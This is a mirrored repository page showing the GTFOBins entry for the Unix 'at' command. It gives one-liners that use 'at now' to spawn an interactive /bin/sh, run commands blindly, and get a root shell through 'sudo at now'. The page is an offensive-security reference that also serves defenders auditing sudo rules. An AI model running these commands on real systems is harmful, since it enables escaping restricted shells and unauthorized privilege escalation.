This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2025-12-29 03:31:42 +01:00
Code
Issues
08dfd05aee
GTFOBins.github.io
/
_gtfobins
/
at.md
Andrea Cardaci
013bf5a0c9
Fix newlines in at
2021-01-15 20:38:33 +01:00
423 B
Raw
Blame
History
functions
shell
command
sudo
code
echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null
description
code
The invocation will be blind, but it is possible to redirect the output to a file in a readable location.
COMMAND=id echo "$COMMAND" | at now
code
echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | sudo at now; tail -f /dev/null